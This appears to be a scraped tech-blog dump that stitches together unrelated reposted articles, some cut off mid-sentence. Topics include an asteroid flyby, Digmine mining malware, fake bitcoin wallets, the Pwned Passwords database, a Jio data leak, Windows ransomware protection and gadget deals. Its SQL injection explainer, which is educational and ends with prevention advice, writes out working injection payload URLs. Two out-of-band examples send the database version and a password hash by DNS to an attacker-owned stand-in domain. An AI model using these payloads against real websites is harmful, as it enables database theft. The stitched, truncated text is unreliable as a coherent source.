Asteroid passing near Earth on Friday

An asteroid between 50 and 130 feet wide will fly by the Earth on Friday on a path closer than the moon's, NASA said this week.

Asteroid 2018 CB is the second small asteroid to buzz by the planet this week, according to NASA.

"Asteroids of this size do not often approach this close to our planet -- maybe only once or twice a year," said Paul Chodas, manager of the Center for Near-Earth Object Studies at NASA's Jet Propulsion Laboratory in Pasadena, California.

The newly discovered space rock will pass within 64,000 kilometres of Earth on Friday afternoon. That's less than one-fifth the distance to the moon.

The manager of NASA's Center for Near-Earth Object Studies, Paul Chodas, said asteroids this size usually don't come this close -- just once or twice a year.

While Friday's close approach isn't a huge deal, Chodas said in an email, "it is a reminder that asteroids can pass very close to our planet and it's important that we find these objects when they do get close."

It will be the second time this week an asteroid buzzes us. On Tuesday, an asteroid passed within 184,000 kilometres, slightly more than halfway to the moon.

Both of this week's asteroids were discovered Feb. 4 by astronomers at the NASA-funded Catalina Sky Survey in Arizona. Last year, more than 2,000 previously unknown near-Earth asteroids were discovered, according to Chodas.

A whopper asteroid named Apophis -- estimated at approximately 1,000 feet or more than 300 metres -- will pass at just one-tenth the distance between Earth and the moon in 2029. In the meantime, astronomers are on the lookout for asteroids lurking in the cosmic shadows.

"These asteroids are simply too small to be detected until they get really close to our planet," he wrote.

That was the case at Chelyabinsk, Russia on Feb. 15, 2013; the incoming object -- an intense fireball as it entered the atmosphere -- caught everyone by surprise.

Hackers Target Facebook Messenger Users With Cryptocurrency Mining Malware

Bitcoin and other cryptocurrencies are gradually picking up the pace in terms of popularity. This also gave room to cybercriminals and hackers to exploit unsuspecting users and their host devices.

According to reports from The Independent, security researchers at Trend Micro have discovered a mining bot, called Digmine that affects Facebook Messenger. So let’s dive in to see some more details on the matter.

Hackers Infect Facebook Messenger Users With A Malware That Mines Bitcoin Alternative Monero Cryptocurrency

As we have mentioned earlier, the malware infects Facebook Messenger in an attempt to mine cryptocurrency. Digmine is equipped with CPU resources in the background that aids in the mining of an anonymous coin called Monero. Monero is currently being traded at $350.

HINDI POST:

मोबाइल वॉलेट का इस्तेमाल कर रहे है तो रहे सावधान

Be sure to note that the file has been disguised in the form of a video file named ‘video_xxxx.zip’. In addition to this, the so-called video file will come from one of your contacts. However, it is only initiated or activated through Facebook Messenger’s desktop version on Google Chrome. This means that at this stage, the mobile version of Facebook Messenger is safe.

So what does Digmine allow hackers to achieve and how? To begin with, it gives hackers and cybercriminals a backdoor access to your Facebook account. Ultimately, the malware is open to your friends’ list allowing it to spread more. By the passage of time, the multiplication goes on. As per the cybersecurity firm Trend Micro:

If the user’s Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account’s friends. The abuse of Facebook is limited to propagation for now, but it wouldn’t be implausible for attackers to hijack the Facebook account itself down the line.

So how does it work? Primarily, Digmine installs a cryptocurrency minor by the name of miner.exe. The said tool is a modified version of the Monero cryptocoin called XMRig. This opensource tool is hence responsible for mining Monero cryptocoin in the background. The profits gathered are then sent to hackers who initiated it.

The extension will read its own configuration from the C&C [command and control] server. It can instruct the extension to either proceed with logging in to Facebook or open a fake page that will play a video. The decoy website that plays the video also serves as part of their C&C structure. This site pretends to be a video streaming site but also holds a lot of the configurations for the malware’s components.

The Digmine bot also installs an autostart mechanism that allows Google Chrome to be launched with a malicious extension. This further makes room for hackers to access your Facebook account’s personal details. These details are then used to spread the malware through Messenger.

Facebook also told Trend Micro that it had taken down any links which are connected to the malware on the site. Further explanations state that hackers have the ability to alter these links. This would further allow them to keep targeting Facebook Messenger users by adding more code, adding additional features to the malware and more which can easily get a hold on to a person’s Facebook account.

There will be more to the story, so be sure to stay tuned in for more details. As for now, what are your thoughts on the Digmine malware affecting Facebook Messenger users? Share your views in the comments.

PS: Thanks for taking time out to read the post. If you liked it, do leave a comment, share it with your network, or follow AMARDEEPHACKS for similar posts in the future.

Hackers take advantage of bitcoin's wild ride in usa

The hype around cryptocurrency is only growing, fueled by the massive rise of bitcoin, the digital currency created in 2009. Its value has skyrocketed by thousands of dollars in the last year, but the price fluctuates regularly.

As the hype grows, so does interest in acquiring digital currency -- both from the general public who might not know much about the technology and hackers who want to profit off it.

"Whenever something gets this much publicity and popularity and there's a potential to make what appears to be free and easy money, the criminal aspects of the world are going to take advantage of it," said Mike Murray, vice president of security intelligence at mobile security firm Lookout.

In order to use bitcoin, you need a digital wallet to receive, send, and store cryptocurrencies. By creating fake wallets, hackers can take advantage of people new to bitcoin and other digital currencies who might not realize the difference between legitimate companies and fake apps.

Lookout recently discovered three fake bitcoin wallet Android apps in the Google Play Store that trick people into sending cybercriminals bitcoin. Some of the apps had thousands of downloads.

Google has since pulled them from the store.


"They were clearly targeted at people who don't know anything about bitcoin, went on the Google Play Store, and started installing bitcoin stuff on their phone," Murray said.

In addition to fake apps, cybercriminals are creating malware that uses people's computers to generate cryptocurrencies in a process called "mining."

By hijacking a stranger's computer or phone, a hacker puts the work on those devices -- a typically costly and complicated process. Mining requires a lot of computing power to solve complicated math problems, verify transaction records and ultimately receive digital coins.

It's no longer feasible to mine bitcoin with personal computers, but you can do so for other currencies like Monero and Ethereum. Candid Wueest, principal threat researcher for security firm Symantec, said the explosive popularity of bitcoin is further sparking interest in other currencies, and malware creators are exploiting tools to mine them.

According to a report from Symantec, malicious mining activity is on the rise. A hacker can hide malicious code on a website and the site's users become digital currency miners without realizing it.

It can be a lucrative scheme. This week, hackers targeted websites using the Wordpress content management system to infect them with Monero mining malware. The attackers reportedly made at least $100,000.

Digital currency exchanges are also a popular target for hackers. On Wednesday, hackers compromised EtherDelta, a place for buying cryptocurrencies. Meanwhile, South Korean bitcoin exchange Youbit said this week it was filing for bankruptcy after criminals stole almost one-fifth of its clients' holdings in the second major cyberattack on its systems this year.

Bitcoin is booming and so are criminal schemes looking to make money off the trend.

Carles Lopez-Penalver, intelligence analyst at security firm Flashpoint, said phishing campaigns from hackers posing as cryptocurrency wallets, exchanges, or other websites try to trick people into forking over currency or personal information. Some of these campaigns appear as advertisements on search engines and websites, or in Slack chatrooms where people discuss digital currencies.
Malicious attacks targeting digital currencies and users are only going to get worse, he said.


"The will and drive to target cryptocurrency-oriented industry is here to stay because of the absurd money that has been pumped into it in the past couple of months," Lopez-Penalver said. "It is one of the most targeted industries right now -- it's what cybercriminals are looking for."

How to Delete Yourself From the Internet

Every day, it seems there’s a new hack or data breach that makes modern computer users wonder if being online is really worth it.

Let’s face it: Completely removing yourself from the internet is not an option for most of us. Your friends may use Evite for party invitations, your book club might choose its next selection on Facebook, or your sister in Schenectady sends photos of her new baby via email. And — oh, yeah — there’s that pesky matter of a job, which might require you to use email, Slack, Facebook, Twitter, Google Docs, Dropbox or any number of other programs.

But in case you’re dreaming of retiring to a deserted island and you can convince Sis to print out and snail-mail all those baby photos, here are some tips for reducing your internet presence — at least the annoying parts.



Sure, at one point you really needed to register with that wedding-photo site to upload your blurry pics of Cousin Charlotte’s Chicago nuptials. But Charlotte’s now long-divorced and she even broke the juicer you gave her, so forget that site. Deseat.me is a web app that scans for all the accounts and services for which you’ve ever created an account, and presents you with a list of them. You can mosey through the list and delete the ones you no longer want in your life — and keep the ones you do.

Note: If you’re deleting accounts at places where you’ve shared information you still want — like a photo-sharing site — make sure you’ve downloaded those images and saved or printed them first.



Try an experiment: Go to Google and search for your next-door neighbor’s name, and attach the words “address” “phone number” and the city you (and they) live in. So something like: “Charlie Brown address phone number Peanutsville.” Try it for yourself. Your high-school flame. Try your grandma’s name. Try it for the least internet-savvy person you know. We’re betting that for at least a few of those names, if you scroll down a bit in the search results, you’ll get some fairly accurate info. (Don’t give in to the temptation to call the old flame — that never ends well.)

You’re likely seeing the name/phone/address info in sites like Spokeo and ZabaSearch. While these sites might seem innocently useful if you’re prepping a holiday-card mailing list, you may not want that info out there, especially if you’re on a delete-me-from-the-net quest. If you have a lot of time, you can painstakingly search through each site where you find your info and follow their get-me-offa-here instructions. Or you can pay for someone else to perform that service. The New York Times has written about DeleteMe, a service from a company called Albine, that will fill out removal forms for you.



You may only really be interested in removing yourself from some of the biggest internet time-sucks. You know who the big four are: Facebook, Amazon, Twitter and LinkedIn. Make sure you are absolutely certain before you say bye-bye, because rebuilding your presence on any one of them could take time if you change your mind.

If Facebook is chewing up too much of your life, you might try removing the mobile app, if you use it, or allowing yourself only an hour every other day or so to check in. But if you do decide to deactivate Facebook, log in and click on the down arrow in the upper right corner of the site. Select Settings, then General, then Manage Account and follow the instructions to deactivate your account. There’s a step beyond deactivating — and that’s full deletion. Facebook has a special page for that, and it’s here.

If you’ve decided you’re spending too much money at Amazon, first wait until any orders you have outstanding are delivered (or cancel those orders, if they’re not already in progress). Download and save any Kindle content you want protected, if you’re a Kindle reader. Now, if you just don’t want Amazon to have access to your money any more, you can simply remove

This Database Contains 320 Million Leaked Passwords and Email Addresses That You Should Stop Using

 Internet users generally have several email addresses which are used to open social media accounts around the web. When you open these social media accounts, you have to come up with a password and sadly enough, a majority of people come up with such basic passwords which hackers use to breach their accounts.

You might have also seen stories of major social networks and email services that got breached and credentials from millions of accounts get leaked on the Internet. 

There is a lot of information out there available to hackers and this guy decided to make it easy for any hacker to sell this information to unscrupulous dealers in the dark web.

Hindi post :

कंप्यूटर और लैपटॉप की स्पीड कैसे बढ़ाये |

पानी में गिरे मोबाइल को ठीक कैसे करे |

Bitcoin क्या है, कैसे काम करता है

Troy Hunt yesterday published a blogpost where he says he aggregated what he called “Pwned Passwords” into a database with 320 million passwords which is insane. He aggregated from combo lists which had email addresses and plain text passwords.

One combo list in example had over 805 million rows of email addresses and plain text passwords of which only 593 million are unique. This means there are a lot of email accounts with more than one passwords attached to them which form the difference. 

What he ended up with was a total of 319.9 million unique Pwned Passwords.

Troy wants this database to be used so that people can search for leaked passwords when registering new accounts or when changing your password to make your accounts secure.

Well if you trust his online search engine, you can check whether your email address or old passwords were breached or you can download the two archives which total to around 5.5GB which are compressed for offline use. 

The passwords are in hash form (SHA1) instead of plain text since these passwords could contain personal information like names, birthdays or even emails. Just make sure not to search your current password since you can never trust any online websites.

First Lenovo Windows 10 S Laptops Unveiled From $279

Lenovo has today unveiled their very first Windows 10 S laptops which are priced from $279 upwards and take the form of the N23 and N24 convertible laptop which is equipped with 11.6 inch touchscreen and comes preloaded with Microsoft’s latest Windows 10 S operating system

 For those not familiar with Windows 10 S the new operating system is a more basic version of Windows 10 Pro which has been created for the education sector to compete with the likes of Google’s Chromebooks.


Specifications of the Lenovo Windows 10S N23 laptop include:
• 1366 x 768 pixel IPS touchscreen display with 360-degree hinge
• Intel Celeron N3060 or N3160 processor
• 4GB of RAM
• 64GB of eMMC storage
• 802.11ac WiFi, Bluetooth 4.0
• 1 USB 3.0 port and 2 USB 2.0 ports
• HDMI and 3.5mm audio ports
• microSD card reader
• water-resistant keyboard
• 11.8″ x 8.3″ x 0.9″
• 3.1 pounds

For india 21,000 Rupees

Check here on Amazon

For other country (usa/uk)

Check here on Amazon

What is the SQL Injection Vulnerability & How to Prevent it?

In the early days of the internet building websites was very simple; no JavaScript and no CSS and a few pictures. But as the web grew more popular the need for more advanced technology and dynamic websites arose. This lead to the development of CGI and server side scripting languages like ASP, JSP and PHP. 

In order to be able to store user input and site content databases were needed. It is therefore of no surprise that every big server side scripting language added support for SQL databases in its early versions. However, as with almost every technical improvement new attack vectors were found. One of the most dangerous issues in terms of data confidentiality and integrity in web applications is a vulnerability called SQL injection.

The Different Types of the SQL Injection Vulnerability

There are several different methods for an attacker to exfiltrate data from a server through SQL Injection vulnerabilities. Some common ones include retrieving data based on errors, timing and conditions (true / false). Let’s look into the different variants of the SQL injection vulnerability

Error based SQL Injection

When exploiting an Error Based SQL Injection vulnerability the attacker can retrieve information such table names and content from visible database errors. Here is an example of an error based SQL injection:

https://example.com/index.php?id=1+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Such request returns the following error: Duplicate entry 'database1' for key 'group_key'

The same method works for table names and content. It is always a good idea to disable error messages on a production system to not give an attacker any insider information.

Boolean Based SQL Injection

Sometimes there is no visible error message on the page when a SQL query fails, making it difficult for an attacker to get information from the vulnerable application. However there is still a  way to extract information.

For example when a SQL query fails sometimes some parts of the web page disappear, change or the whole website does not load at all. These indications allow an attacker to determine if the input parameter is vulnerable, and if it allows extraction of data. A common test for that is to insert some condition inside the SQL query such as:

https://example.com/index.php?id=1+AND+1=1

If the page loads as usual it might be vulnerability to a SQL Injection. To be sure an attacker typically tries  to provoke a false result, such as:

https://example.com/index.php?id=1+AND+1=2

Since the condition is false, if no result is returned and the page does not work as usual, for example has some missing text, or a white page is shown, it might be vulnerable to a SQL injection. Here is an example of how to extract data with the above technique:

https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',true,false)

With the above request the page should load as usual if the database version is 5.X, but will behave differently (e.g. empty page) if the version is different, giving the attacker an indication if it is vulnerable to SQL injection or not.

Time based SQL Injection

In some cases a vulnerable SQL query does not have any visible effect on the output of the page. Thouh in such cases it is still possible to extract information from the underlying database when exploiting a SQL injection vulnerability.

This is done by instructing the database to wait a measurable amount of time before responding. If the page is not vulnerable it will load as usual, but if it is vulnerable it will take longer to load. By using this method data can still be extracted even though there are no visible change on the page. The SQL syntax can be similar to the one used in the boolean based SQL injection vulnerability. But to get a measurable sleep time we have to change the “true” to a function that takes some time to execute, such as sleep(3) which lets the database sleep for 3 seconds:

https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false)

If the page takes longer than usual to load it is safe to assume that the database version is 5.X.

Out-of-Band SQL Injection Vulnerability

Sometimes the only way an attacker can retrieve information from a database is to use out of band techniques. Usually these type of attacks involve sending the data directly from the database server to a machine that is controlled by the attacker. Attackers might use such method if an injection does not occur directly after the supplied data is inserted, but at a later point in time. An example for an Out-of-Band technique follows:

https://example.com/index.php?id=1+AND+(SELECT+LOAD_FILE(concat('\\\\',(SELECT @@version),'example.com\\')))

https://www.example.com/index.php?query=declare @pass nvarchar(100);SELECT @pass=(SELECT TOP 1 password_hash FROM users);exec('xp_fileexist ''\\' + @pass + '.example.com\c$\boot.ini''')

With the above requests, the target makes a DNS request to the attacker owned domain with the query result inside the sub domain. By using this method an attacker does not need to directly see the result of the injection, but can wait until the database server sends a request instead.

Impacts of the SQL Injection Vulnerability

There are a variety of things an attacker can do when exploiting a SQL injection on a vulnerable website. Mostly though it depends on the privileges the user the web application uses has to connect to the database server. By exploiting a SQL injection vulnerability an attacker can:

• Add, delete, edit or read content from the database
• Read source code from files on the database server
• Write files to the database server

It all depends on the capabilities of the attacker, but the exploitation of a SQL injection vulnerability can even lead to complete takeover of the database and web server. You can learn more useful tips on how to test the impact of an SQL injection vulnerability on your website by referring to the  SQL injection cheat sheet.

Preventing SQL Injection Vulnerabilities

Server side scripting languages are not able to determine whether or not the SQL query string is malformed; all they can do is send a string to the database server and wait for the interpreted response.

Therefore when developing web applications you should use prepared statements to prevent SQL injections. When using prepared statements the structure and data are separated and can be interpreted by the sql server without risking that an attacker is able to change the structure of the SQL query for malicious purposes.

New blog update blog in hindi

If any one want to tech news, best gadget review 

and many techi things

 in HINDI

Check out my new blog 

Here all tech related things for you

Techinews18

See something techi in HINDI

10 coolest hidden Google tricks which is prity awesome

Google is awesome. Yes, there have been
questions raised about its new privacy policy and creepy Safari tracking and frankly, it just knows way too much about everyone who has ever created a Google account. But let’s put that aside for a moment and focus on all its cool quirks, shall we?

They’re built into practically every Google product — if you look hard enough, you’ll find that entering the right search term or typing a code can make Google collapse, spin or create fictional characters. Here are 15 easter eggs (hidden, entertaining things developers build into a website or program) for you to discover the next time you’re Googling.

Earlier post:

What is BITCOIN ?

Whatsaap tricks and hacks.

What is wannacry Ramsomware?

1. Barrel roll:

Endlessly entertaining, this one trended worldwide on Twitter in November. Simply search “do a barrel roll” — if you have Google’s instant results functions enabled, your results page will be spinning before you’ve completed the instruction

2. Gravity:

If, by any chance, you feeling like searching “Google gravity” and hitting “I’m feeling lucky”, don’t be surprised if Google comes crashing down around you the second you move the mouse. (Hint: you can disable Google’s instant results in your account preferences page to make sure you get the ‘I’m feeling lucky’ option).

Hindi post:
# पानी में गिरे मोबाइल को ठीक कैसे करे 

3. Recursion:

Google pokes fun at its own “did you mean” suggestions if you search recursion (repetition or returning) by questioning your spelling even though you didn’t make a mistake.

4. Klingon:

So “GoogleDaq ylnej” means “Google search”. Hmmm. Who knew? Well, you, if you speak Klingon. Yes, there is a Klingon version of Google. There is also a pirate and Elmer Fudd version, if that’s more your thing.

5. Kerning:

Designers will love this one — kerning is the spacing between letters in a word. When you do a search for kerning, Google changes the spaces between letters in the word ‘kerning’ in all the results. Heehee. You see what they did there?

6. Hello, Nessy:

Picture this: You’re working under a tight deadline, your clock is slowly counting the minutes past 3AM and your coffee and Red Bull combo is failing. The sleep deprivation is starting to affect you — you are starting to see things. You click to your home page, and there, rising gracefully from the dark waves in your iGoogle theme, is the Lochness Monster.
No, you’re not hallucinating — you really did see Nessy. If you are ever awake and online at 3:14 AM (those are the first three digits in Pi, by the way), and have the iGoogle beach theme installed, Nessy will come to visit for a minute. If you’re not an insomniac, you can always just change the timezone on your computer and in your iGoogle settings and just wait until 14 minutes past the hour (I was in Bangkok last night, as far as Google knows). Unfortunately, it looks like the monster will be no more after iGoogle is retired in November 2013.

7. Doodles:

What do you get if you don’t actually search for anything, and just hit ‘I’m feeling lucky’? A catalogue of all the Google doodles — all the way back to 1998. There were just three in that year — there have already been 69 in 2012.

8. Konami ninja:

If you type in the Konami code (a cheat code used in Konami games) in Google Reader, the side panel will turn blue and a cute ninja will appear on the left of your screen. Use your arrow keys and keyboard to enter the code — it’s up, up, down, down, left, right, left, right, followed by the letters B and A. Like iGoogle’s Nessy, this one is going away after Reader is retired in July 2013.

9. Laundry:

There are a lot of things Gmail can do for you — filter spam, flood you with ads, apply a plethora of pretty coloured labels to your messages — but, as yet, it can’t do your laundry. However, it is an option on the ‘suggest a feature’ page for Gmail.

10. Pacman:

It started out as a Google doodle to commemorate the 30th anniversary of Pacman in 2010, but the Google Pacman game was so popular, it was given a permanent home.

Reliance Jio hacked in possibly biggest data breach ever in India; Mukesh Ambani telco says data safe; probe ordered

Reliance Jio hacked:

  It seems Reliance Jio subscribers data has been leaked and available online. Few people have shared a link on social media that allows users to search Jio SIM details.

MAGICAPK.COM

Enter the phone number and it shows the name, circle, email address and activation date.

Best deals on mobile phonesThinking to buy a phone? do not miss these awesome

The good thing is that Aadhaar number was not among leaked data in all the searches I tried.

I tested this form to search for different Jio numbers and it was showing correct subscriber data. Sometimes, it fails to show the data but trying again will show the data.


Note: I am not sharing the link of that website to stop misuse of the link
I have tried contacting Jio representative to check if they know ab

out this data leak. I will update this post with their statement.

 In a major setback to Mukesh Ambani led Reliance Industries today, it has been revealed that its new telco arm Reliance Jio database has been hacked.
 The company has said that the database is safe and that a probe has been ordered t find out what exactly had happened. The numbers involved are as high as 120 mn, but their exact status is not known yet and this could well turn out to be the biggest data breach ever in India. 

According to a statement released by Reliance Jio spokesperson, “We have come across the unverified and unsubstantiated claims of the website and are investigating it.

 Prima facie the data appears to be unauthentic. We want to assure our subscribers that their data is safe and maintained with highest security. Data is only shared with authorities as per their requirement. We have informed law enforcement agencies about the claims of the website and will follow through to ensure strict action is taken.

After the alleged breach, the data of customers has been uploaded on magicapk.com website, according to Indian Express Online. Among the first to report the hacking was Fonearena.com.
 IE spoke to Editor Varun Krish who expressed his shock at being able to find the particulars of his and those of his colleagues accounts available.

Windows 10 to Get Built-in Protection Against Most Ransomware Attacks

 Ransomware Everywhere Not a Single Place to Hide!

But, Microsoft has a simple solution to this problem to protect millions of its users against most ransomware attacks.
Microsoft had update for older versions about ransomware with Microsoft security patchs.

Two massive ransomware attacks — WannaCry and Petya (also known as NotPetya) — in a month have caused chaos and disruption worldwide, forcing hospitals, ATMs, shipping companies, governments, airports and car companies to shut down their operations.

Most ransomware in the market, including WannaCry and NotPetya, are specifically designed to target computers running Windows operating system, which is why Microsoft has been blamed for not putting proper defensive measures in place to prevent such threats.

But not now!

In the wake of recent devastating global ransomware outbreaks, Microsoft has finally realized that its Windows operating system is deadly vulnerable to ransomware and other emerging threats that specifically targets its platform.

To tackle this serious issue, the tech giant has introduced a new anti-ransomware feature in its latest Windows 10 Insider Preview Build (16232) yesterday evening, along with several other security features.

Microsoft is planning to introduce these security features in Windows 10 Creator Update (also known as RedStone 3), which is expected to release sometime between September and October 2017.

The anti-ransomware feature, dubbed Controlled Folder Access, is part of Windows Defender that blocks unauthorized applications from making any modifications to your important files located in certain "protected" folders.

Applications on a whitelist can only access Protected folders. So you can add or remove the apps from the list. Certain applications will be whitelisted automatically, though the company doesn't specify which applications.


Once turned on, "Controlled folder access" will watch over files stored inside Protected folders and any attempt to access or modify a protected file by non-whitelisted apps will be blocked by Windows Defender, preventing most ransomware to encrypt your important files.

So, whenever an application tries to make changes to Protected files but is blacklisted by the feature, you will get a notification about the attempt.

How to Enable Controlled Folder Access, Whitelist Apps and Add or Remove Protected Folders

Here's how to enable the Controlled folder access feature:

■Go to Start menu and Open the Windows Defender Security Center
■Go to the Virus & Threat Protection settings section
■Set the switch to On

Here's how to allow apps that you trust is being blocked by the Controlled folder access feature to access Protected folders:

Go to Start menu and Open the Windows Defender Security Center
■Go to the Virus & Threat Protection settings section
■Click 'Allow an app through Controlled folder access' in the Controlled folder access area
■Click 'Add an allowed app' and select the app you want to allow

Windows library folders like Documents, Pictures, Movies, and Desktop are designated as being compulsorily "protected" by default, which can not be removed.



However, users can add or remove their personal folders to the list of protected folders. Here's how to add folders to Protected folders list:

■Go to Start menu and Open the Windows Defender Security Center
■Go to the Virus & Threat Protection settings section
■Click 'Protected folders' in the Controlled folder access area
■Enter the full path of the folder you want to monitor

Users can also enter network shares and mapped drives, but environment variables and wildcards are not supported at this moment.

Other Security Feature Introduced in Windows 10 Insider Program
With the release of Windows 10 Insider Preview Build 16232, Windows Defender Application Guard (WDAG) for Edge — a new system for running Microsoft Edge in a special virtual machine in order to protect the OS from browser-based flaws — also received improvements in usability.

Windows 10 Insider Preview Build also comes with support for Microsoft Edge data persistence when using WDAG.
"Once enabled, data such as your favorites, cookies, and saved passwords will be 

Good News! WhatsApp will soon let you share any type of file

We know that WhatsApp is introducing new features one by one to keep in on par with the other messaging platforms. Until recently, the platform was pretty slow in rolling out new features but not anymore.

 You can soon share any type of file via WhatsApp WhatsApp seems to be testing new functionality and it is definitely that the new features will be welcome by most users. As per the recent reports from WABetaInfo,

WhatsApp is testing a new feature that will let you share any type of file with your contacts or groups. This is a great improvement to the current ability of the app.
We say this as the app right now supports only specific file types such as Word documents, slides, spreadsheets, and PDFs. It is definitely good news for the users as the restriction on the file types that can be shared will not be there anymore. With the rollout of the new feature, you can share any file type such as csv, doc, docx, pdf, ppt, pptx, rtf, txt, xls, xlsx, etc. with others.
 However, when this ability will be rolled out to WhatsApp remains unclear for now. As mentioned above, this feature is right now under testing. As per the source, the maximum file size that will be allowed will be 100MB for Android, 128MB for iOS and 64MB on WhatsApp Web. For now, this feature is being tested only with a limited subset of users. We believe that the company offers support for 4K videos too, but that will take up a huge chunk of its servers as millions of users will start sharing them via WhatsApp.

NEW UPDATE IN LEFT SIDEBAR HERE TWO CHEAP PRODUCT BUY IT.

Microsoft issues more security patches for older Windows, citing cyber attack risk

 In the wake of last month’s WannaCry malware outbreak, Microsoft has once again issued patches to programs it no longer supports, citing vulnerabilities in their code that could make them vulnerable to cyber attacks by nation-states or copycat organizations.

 The patches come a month after the company issued patches for Windows XP computers to protect against WannaCry, despite its long-standing stance against updating older and unsupported versions of its Windows operating system.

Microsoft "Due to the elevated risk for destructive cyber attacks at this time, we made the decision to take this action because applying these updates provides further protection against potential attacks with characteristics similar to WannaCrypt," wrote Adrienne Hall, general manager for Microsoft's cyber defense operations center. WannaCrypt is another name for the WannaCry ransomware.

 The patches hit, as they have since 2003, on the second Tuesday of the month at 10 a.m. Pacific time, when Microsoft makes security and other fixes to its programs available for users who aren't signed up for automatic updates – what's known as "Patch Tuesday."

Up until now, only customers who paid hefty fees could continue to get any support for older programs such as WindowsXP and Windows 8.1.
 The release of the WannaCry malware, which seized files on hundreds of thousands of computers with demands for ransom, forced it to change its approach. The company made available patches that protected against WannaCry despite its long-standing stance against providing patches for unsupported programs.

 The decision to offer patches to long-gone programs such as Windows XP, Windows 8 and Server 2003 is a tough one for the company, said Stephen Kleynhans, a research vice president at Gartner who looks at the enterprise PC market.

 If the Redmond, Wash.-based company plays hardball and says it’s done with fixes and then something terrible happens, “they look like the bad guys. But if they do issue a fix, everybody who’s paying is mad at them,” he said.

PlayStation Store Sale Alert: Days Of Play Now Online With Deals For 'Horizon Zero Dawn,' 'Prey,' 'Battlefield 1' And More

Sony's Days of Play sale is now online on the PlayStation Store, offering massive discounts to popular PlayStation 4 titles such as Horizon Zero Dawn, Prey , and Battlefield 1 .

The sale launches just before Sony heads into this year's E3 2017, where the biggest question is whether the PlayStation 4 can maintain its lead over steady rival Xbox One and new challenger Nintendo Switch.
 PlayStation Store Days Of Play Sale Online The Days of Play sale on Sony's PlayStation Store promises "one week of epic game deals," with discounts of up to 50 percent off to several great titles. PlayStation Plus subscribers are entitled to additional discounts to some items on sale.

The titles included in the Days of Play sale are the following: 

Battlefield 1 - from $59.99 to $29.99, $23.99 with PS Plus 
Battlefield 1 Deluxe Edition - from $79.99 to $39.99, $31.99 with PS Plus
 Battlefield 1 Premium Pass - from $49.99 to $44.99, $39.99 with PS Plus
 Battlefield 1 Ultimate Edition - from $129.99 to $77.99, $64.99 with PS Plus
 Call of Duty: Infinite Warfare - from $59.99 to $44.39, $39.59 with PS Plus
Call of Duty: Infinite Warfare Digital Deluxe - from $99.99 to $89.99, $74.99 with PS Plus 
Call of Duty: Infinite Warfare Legacy Edition - from $79.99 to $59.99, $54.39 with PS Plus
 Call of Duty: Infinite Warfare Season Pass - from $49.99 to $44.99, $39.99 with PS Plus
 Final Fantasy XV - from $49.99 to $34.99, $29.99 with PS Plus
 Final Fantasy XV Digital Premium Edition - from $74.99 to $52.49, $44.99 with PS Plus Horizon Zero Dawn - from $59.99 to $39.59
 Horizon Zero Dawn Digital Deluxe Edition - from $69.99 to $49.69
 Mass Effect: Andromeda - from $59.99 to $29.99 
Mass Effect: Andromeda Deluxe Edition - from $69.99 to $34.99 
MLB The Show 17 - from $59.99 to $39.59
 Nioh - from $59.99 to $39.59 Nioh Digital Deluxe - from $79.99 to $52.79 Prey - from $59.99 to $39.59 
The Last Guardian - from $39.99 to $26.39 
Uncharted 4: A Thief's End - from $39.99 to $19.99 
Watch Dogs 2 - from $59.99 to $25.19
 Watch Dogs 2 Deluxe Edition - from $69.99 to $31.49 
Watch Dogs 2 Gold Edition - from $99.99 to $49.99 
Yakuza 0 - from $59.99 to $47.99 
Yooka-Laylee - from $39.99 to $29.99 

In addition to the games on sale, PlayStation owners can also refresh their PlayStation Plus membership with a 12-month subscription of only $49.99, down from the original price of $59.99. Gamers who are looking to purchase multiple titles should think about buying the PlayStation Plus membership first, as the additional discounts will be worth it.

 Lastly, players who spend at least $100 until June 20 will receive $15 back as PlayStation Store credit. Purchasing the 12-month PlayStation Plus subscription will count toward the $100 requirement. The Days of Play sale will last until June 16, 8:00 a.m. PT. Gold PlayStation 4 Now On Sale

Alongside the Days of Play sale, Sony has put up the previously reported 1 TB gold PlayStation 4 for sale. The special console comes with a matching DualShock controller for a price tag of $250.

All DualShock 4 controllers have also been marked down to $40 for the duration of the sale, with the Gold wireless headset also seeing its price slashed to $80.

OnePlus 5 pricing is expected to start at Rs 32,999 for the 6 GB RAM, 64 GB storage model

One of the most anticipated flagships of the year is headed to our shores and while many of the details are still shrouded in mystery, someone appears to have leaked the all-important price of the device.

True-tech.net claims to have received an anonymous tip from a “viable” source who suggests the following Indian prices for the upcoming handset:

OnePlus 5: 6 GB RAM, 64 GB storage – Rs 32,999

OnePlus 5: 8 GB RAM, 128 GB storage – Rs 37,999

 We haven’t been able to confirm the prices for ourselves, but the leaked pricing is in line with our expectations for the handset. We were expecting to see a 256 GB variant of the handset, though details of that variant aren’t out yet.
Regarding the rest of the specifications, the device is expected to be powered by the top-of-the-line Qualcomm Snapdragon 835 platform. The screen is set to be a 5.5-inch AMOLED screen with a resolution of 2560×1440. It’s protected by Gorilla Glass 5.

In terms of connectivity, we’re supposed to get Wi-Fi 802.11 a/b/g/n/ac, Bluetooth 5.0 and even USB 3.1 with a Type-C connector.

Leaked and teased images have a very iPhone 7 Plus vibe to them, especially as we’re seeing a dual 12 MP camera on the rear of the device. The front camera is expected to be an 8 MP unit.

The device is expected to launch on 20 June worldwide, with an India launch happening on 22 June.